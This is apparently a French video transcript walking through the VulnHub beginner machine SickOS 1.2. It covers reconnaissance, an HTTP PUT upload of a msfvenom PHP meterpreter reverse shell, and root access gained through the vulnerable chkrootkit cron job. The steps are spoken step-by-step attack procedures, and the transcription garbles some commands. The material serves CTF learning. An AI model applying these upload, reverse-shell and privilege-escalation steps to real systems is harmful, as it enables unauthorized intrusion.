Hey what's going on guys c'est Anès et bienvenue dans cette nouvelle vidéo dans laquelle on va voir la solution du serveur SICK OS 1.2 donc ça c'est un serveur pour débutants l'objectif c'est tout simplement de lire le fichier texte qui contient le flag sur le chemin route ensuite c'est simple, vous savez la procédure, il suffit juste de télécharger l'image c'est 600 megabytes de taille et vous pouvez la lancer avec soit virtualbox ou vmware donc le DHCP est activé donc vous aurez une adresse IP pour la machine cible automatiquement et on peut commencer le challenge donc ici j'ai Kali Linux 2019 voilà donc ça c'est Kali et ici j'ai la machine ou le serveur SICK OS 1.2 donc la première chose à faire c'est bien évidemment d'essayer de trouver l'adresse IP de la machine cible donc je vais zoomer un peu voilà et pour cela je vais utiliser NetDiscover avec l'option d'HR ensuite je vais entrer l'adresse IP du réseau qui est le slash 24 donc ici NetDiscover va essayer de chercher des dispositifs connectés au réseau on a ici une machine qui s'appelle PCS System GmbH donc si on veut s'assurer que c'est notre machine cible je peux faire un scan rapide avec Nmap donc rapidement je change le clavier en français voilà nmap-f et là je vais coller l'adresse IP donc ça c'est juste pour s'assurer que c'est le serveur SICK OS et une fois j'ai confirmé que c'est ça je peux lancer un scan intense sur la machine donc vous voyez c'est Oracle VirtualBox Network Interface Card donc ça c'est notre serveur cible donc je vais arrêter une NetDiscover et on peut voir qu'on a deux ports ouverts sur le serveur le port 22 et le port 80 maintenant je peux faire dash nmap-a pour le scan intense dash pn pour ne pas pinguer la cible et l'adresse IP de la machine qui est la .43 très bien si on revient sur le scan rapide on peut voir qu'on a le service SSH sur le port 22 on a le service HTTP sur le port 80 donc on revient sur le scan intense donc ici on a des informations plus davantage d'informations sur les services on a le service open SSH 5.9 donc je peux prendre ça et chercher sur SearchSploit si on peut trouver des exploits pour cette version pas d'exploits si on cherche la 5 des résultats plus ou moins vagues on a le open SSH 3.5 le 7.6 donc ça c'est pas très pertinent je peux aussi chercher la version de serveur web donc on a le service light httpd 1.4 donc d'habitude on voit le service apathy sur le serveur web ici on a le light httpd 1.4 même chose je peux chercher sur SearchSploit si on peut trouver des exploits pas d'exploits et c'est tout donc on a le linux kernel 3 linux kernel 3.2 3.10 c'est pas très précis mais on va énumérer davantage ce serveur donc la première chose à faire c'est bien évidemment de consulter l'interface web pour cela je peux entrer l'adresse IP du serveur et là on a un petit meme ici what if computer viruses are already made by the antivirus software il y a une faute ici companies to make money donc ça c'est un petit meme on peut voir ici un petit texte qui dit quickmeme.com donc c'est la source on peut faire view page source et là il n'y a pas d'informations très importantes ici un commentaire nothing in here ici l'image qu'on a utilisé pour le meme donc rien d'intéressant on revient sur le terminal et là je vais lancer nicto dash dash host http donc espérons que nicto va nous donner quelques informations voilà donc on a php 5.3.10 ubuntu 3.21 pas mal donc on a pu préciser la version de ubuntu c'est la 3.21 hyper important serveur light httpd 1.4.24 28 plutôt voilà on peut aussi on peut aussi chercher avec un outil qui s'appelle curl donc curl c'est un outil qui va nous permettre d'interagir avec le serveur web mais on va attendre quelques instants le résultat de nicto et aussi on va faire du brute forcing pour le serveur pour brute forcer les répertoires et les fichiers donc pour cela je vais faire derb donc et l'adresse qui lui serve très bien maintenant je vais suivre ce lien ici donc je vais copier le lien et je vais le coller ici donc ça c'est un répertoire qui contient quelques fichiers que j'ai utilisé précédemment pour résoudre le serveur mais principalement vous allez trouver que ce répertoire est vide sur le serveur donc si on revient toujours sur nicto on voit qu'il n'a pas trouvé assez d'informations concernant le serveur mais c'est pas grave donc jusque là je peux utiliser curl pour je peux utiliser curl pour énumérer le serveur et essayer de trouver des options ou les méthodes permises sur le serveur pour cela je vais utiliser la commande curl dash dash request request voilà options dash vie et je vais utiliser le lien du serveur web donc donc http slash slash 1 43 nothing in here voilà donc ici on peut voir qu'il a pu euh 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 donc je pense que j'ai fait une fois donc curl dash vie dash dash request options http oh pardon j'ai oublié de spécifier le répertoire test très bien voilà donc ici sur le répertoire test on peut voir que les options des options permises ou allowing methods or options on a delete, mk, call, put, move, copy, propatch, lock, unlock donc les méthodes on a vu comment énumérer les méthodes avec un script python auparavant sur la chaîne donc la dangerosité d'utiliser des méthodes qu'on put sur un serveur c'est que ça va nous permettre de uploader des payloads de fichiers ou des scripts sur le serveur spécifiquement sur le répertoire test qu'on vient de découvrir donc ici l'objectif c'est de créer un payload et essayer de l'uploader sur le répertoire test et l'exécuter pour avoir un shell directement sur le serveur donc ici pour cela je vais créer un payload avec msfvenom donc je vais créer un payload php donc ça sera php metapurator reverse tcp ensuite je vais préciser l'adresse ip lhost qui est l'adresse ip de la machine kali donc si je fais af config voici l'adresse de ma machine kali linux donc c'est 1 51 ensuite le l port c'est le port qui va recevoir la connexion je vais choisir le 443 c'est mon port préféré parce que ça va nous permettre de contourner quelques règles du pare-feu sur le serveur cible ensuite je vais préciser la sortie qui est le dash o et je vais rediriger la sortie vers pictures pictures reverse.php donc ça c'est le nom de notre payload entrer et msfvenom va créer un payload de type php sur le port 443 la machine kali linux et la sortie sera reverse.php ensuite on va essayer de l'uploader sur le répertoire test et établir un écouteur pour capter la connexion donc on a notre payload si on fait ls route pictures nous avons notre reverse php maintenant ce que je vais faire c'est tout simplement lancer curl pour pouvoir uploader ce fichier donc je vais faire curl dash dash upload file ensuite je vais nommer mon fichier ou mon payload qui est pictures reverse php dash v dash dash url http l'adresse ip de la machine ou le serveur cible ensuite le répertoire test maintenant je vais ajouter une option de dash dash http 1.0 sinon vous aurez une erreur lors de l'upload donc voilà normalement we are completely uploaded and fine donc si je check le répertoire vous allez voir un reverse php pour cela je vais maintenant faire msf console pour établir un écouteur voilà donc msf console va nous aider à mettre en place un écouteur qui va capter la connexion générée sur le serveur donc ça c'est le reverse shell c'est à dire que la connexion va venir de la part de notre victime donc je vais faire use exploit multi handler set payload php meter prater reverse tcp show options donc je vais préciser le lhost avec l'adresse ip de la machine kali 51 set lport 443 je vais show options tout est bon on fait run et voici l'écouteur qui est en train d'attendre à la connexion depuis le serveur donc ici sur le serveur je vais cliquer sur mon reverse.php et je veux revenir sur l'écouteur et vous allez voir que vous avez une session ouverte sur le serveur on peut faire six infos et vous allez avoir des informations générales concernant le serveur notamment le type de système d'exploitation le noyau linux ubuntu 3.11.0 et le type de meter prater cphp linux on peut faire get your id comme vous voyez on est en train d'opérer en tant que www dash data donc si on peut si on veut faire cd route pour lire le flag on a une erreur une erreur qui dit operation field donc on n'a pas assez de privilèges pour faire ce mouvement et pour cela il nous faut faire de l'escalade de privilèges donc pour l'escalade de privilèges ce que j'ai essayé c'est de prendre ce type de kernel et j'ai essayé de chercher sur google bien évidemment voilà donc on va essayer de chercher des exploits pour ce type de kernel 3.11 on trouve un exploit sur exploit database si on check l'exploit vous allez voir que c'est un exploit local privilege escalation donc c'est un exploit écrit en C vous pouvez le télécharger je l'ai téléchargé ensuite il faut le compiler donc la commande de compilation elle est ici donc vous pouvez prendre cette commande et si on se déplace vers downloads on fait ls voici l'exploit le voici je vais coller la commande et là je vais juste préciser que c'est pas exploit.c mais c'est 4 ans pardon très bien donc la commande va compiler l'exploit et voici notre exploit le problème c'est qu'il faut aussi l'uploader donc je vais uploader cet exploit sur le serveur si on fait upload file dash v dash dash url http l'adresse ip de la machine serveur ou le serveur cible test donc on a oublié qu'est-ce qu'on a oublié can't open dash v curl pardon pardon exploit très bien donc normalement on va trouver notre exploit sur le serveur voilà voilà notre exploit donc ici ce que je vais faire c'est d'exécuter cet exploit donc si on fait ls et si on essaie d'exploiter ou d'exécuter l'exploit même chose on a pas assez de privilèges je vais sauter vers un shell si on fait ls voilà j'essaie d'exploiter même chose permission denied on a pas assez de permissions pour exécuter cet exploit donc pour cela je vais maintenant essayer quelque chose de différent maintenant par exemple si on essaie de consulter le un outil qui s'appelle crone donc crone c'est un outil ou un programme sur les systèmes linux qui va permettre de programmer l'exécution de certains programmes sur le système d'exploitation c'est à dire si vous avez par exemple prenant pour un exemple le navigateur web crone vous pouvez l'utiliser pour programmer le lancement et l'arrêt de ce navigateur là par exemple si vous voulez que votre navigateur se lance après une heure du lancement du système d'exploitation vous pouvez utiliser crone pour programmer cette tâche là voilà donc pour voir les fichiers de crone on peut faire 4 etc crone tab ah là là ça marche pas donc je vais sauter vers meterpreter si on fait 4 etc crone tab voilà les fichiers de crone tab sur ce serveur alors on a des fichiers concernant crone daily c'est à dire de tous les jours on a weekly et on a monthly donc je peux faire cd etc crone.daily je peux faire ls et là vous allez avoir plusieurs résultats on a light httpd donc ça le serveur web du pkg l'outil de paquet de paquetage on a standard password mlocate man database on a apt aptitude on a check rootkit donc on a déjà vu cet outil sur la chaîne pour le scanning de rootkit sur les systèmes linux donc check rootkit dpkg light httpd on va essayer de voir la version de check rootkit ici donc on peut faire shell check check rootkit voilà pardon check rootkit need root privileges pour le lancement donc je vais faire que check rootkit juste pour voir la version dhv donc on peut voir qu'on a check rootkit version 0.49 donc si on revient sur google une autre fois juste pour chercher un exploit pour ce type de check rootkit parce que je pense que c'est une version c'est une vieille version donc je peux faire check rootkit 0.4 voilà exploit privilege escalation donc on a an exploit sur exploit database je peux voir ici we just found a serious vulnerability in the check root package which may allow local attackers to gain root access to a box c'est ce qu'on veut avoir sur ce box une certain configuration donc ce qu'on va faire c'est de prendre ou chercher d'abord sur search exploit c'est on fait check rootkit voilà notre script donc local privilege escalation on a ici exploit Linux local et on a le fichier texte donc je pense qu'il y a un exploit sur voilà rapid7 directement sur metasploit donc si on peut lancer directement le module sur metasploit ça serait mieux voilà donc check rootkit before 0.5 we run an executable donc je vais copier le chemin de l'exploit exploit unix local check rootkit toujours sur metasploit je vais faire background clear et là je vais utiliser cet exploit je vais préciser les sessions qu'on veut utiliser donc ici j'ai combien de sessions j'ai une session si on fait show options il nous faut préciser la session donc set session one et on fait run donc cet exploit normalement va exploiter cette version vulnérable de check rootkit et qu'on voit ici et qu'on voit ici waiting for check rootkit to run via cron donc ici actuellement cet exploit il est en train d'attendre cron de lancer check rootkit parce que sur le serveur on n'a pas les privilèges de faire ça il faut les privilèges de route c'est pour ça on va attendre cron pour lancer check rootkit l'outil pour ensuite l'exploiter et avoir un accès root sur le serveur donc on a vu ce type d'exploit déjà auparavant sur la chaîne on l'a fait avec nmap je pense sur un autre serveur de vune hub d'où on a eu notre privilège root sur le serveur donc c'est le même concept nous sommes en train d'utiliser un outil qui utilise des privilèges de route mais par l'intermédiaire d'autres outils ici dans ce cas c'est cron all right guys comme vous voyez on a pu avoir notre troisième shell open comme vous voyez ici mais juste pour préciser j'ai dû changer de port parce que avec le port 444 comme vous voyez ici j'ai attendu beaucoup de temps peut-être deux ou trois heures et j'ai dû changer vers le 80 80 vu qu'il y a un pare-feu sur le serveur et avec ce 80 80 j'ai pu avoir le shell en quelques secondes donc ici il faut aussi comprendre que j'ai choisi check rootkit parce que c'était un programme qui s'exécute daily c'est à dire tous les jours si on choisit un programme qui s'exécute monthly par exemple chaque chaque mois on va devoir attendre beaucoup de temps donc il faut être il faut comprendre ce point très très bien c'est pour ça j'ai choisi des programmes qui s'exécutent avec cron daily c'est à dire tous les jours et en exécutant notre module d'exploitation on a pu exploiter check rootkit cette version vulnérable de check rootkit et avoir normalement les privilèges de route si on fait ou amai voilà on est route sur le système maintenant je vais me déplacer vers route et là je vais faire ls et voici le fichier qui contient le flag donc je vais prendre ce fichier texte je vais faire copier cut et je vais afficher le contenu du fichier flag donc thanks for giving this try thanks for hosting this app donc wow if you are viewing this you have successfully completed SICK OS 1.2 the challenge is more focused on elimination of tools in real scenarios where tools can be blocked during an assessment donc des fois durant votre pen test il y a des outils qui sont interdits par exemple vous pouvez pas utiliser le framework Metasploit ou Nikto ou d'autres frameworks de pen testing dans ce cas là vous êtes obligé de faire un pen test manuel gathering more information about the target using different methods though while developing many of the tools were limited completely blocked to get the feel of old school and testing it manually donc apprendre à pen tester ou à tester la sécurité d'une entité manuellement est très important et le truc le plus important dans ce serveur au moins pour un débutant c'est que il faut toujours scanner pour les options et les méthodes permises sur le serveur et c'est ça qui nous a permis d'uploader le payload et avoir une session m'interpréteur sur notre serveur et après c'était juste une escalade de privilèges en exploitant un programme vulnérable sur le serveur donc c'était ça le serveur SICK OS 1.2 je pense qu'il y a un autre SICK OS sur VUNHUB si ça vous intéresse on peut le faire il n'y a aucun problème avec ça vous pouvez me le demander dans la section de commentaires si vous avez des questions aussi dans la section de commentaires et dans les prochaines vidéos on va se concentrer plus ou moins sur les CTF des différentes plateformes que ce soit TryHackMe, HackTheBox, RootMe, VUNHUB etc. si vous avez d'autres plateformes à suggérer allez-y dans la section de commentaires parce que YouTube récemment m'a alerté 3 ou 4 fois concernant des vidéos de Wi-Fi hacking et des vidéos d'exploitation et du coup je vais devoir changer un peu de format et de plan sur le contenu sur la chaîne je vais me rediriger vers les solutions de challenge et je vais aussi trouver une autre plateforme pour publier des vidéos qui parlent d'exploit et des Zero Days etc. donc voilà pour cette vidéo j'espère que vous avez aimé le truc si vous avez des questions vas-y les pouces bleus n'oubliez pas surtout et on se retrouve dans la prochaine vidéo peace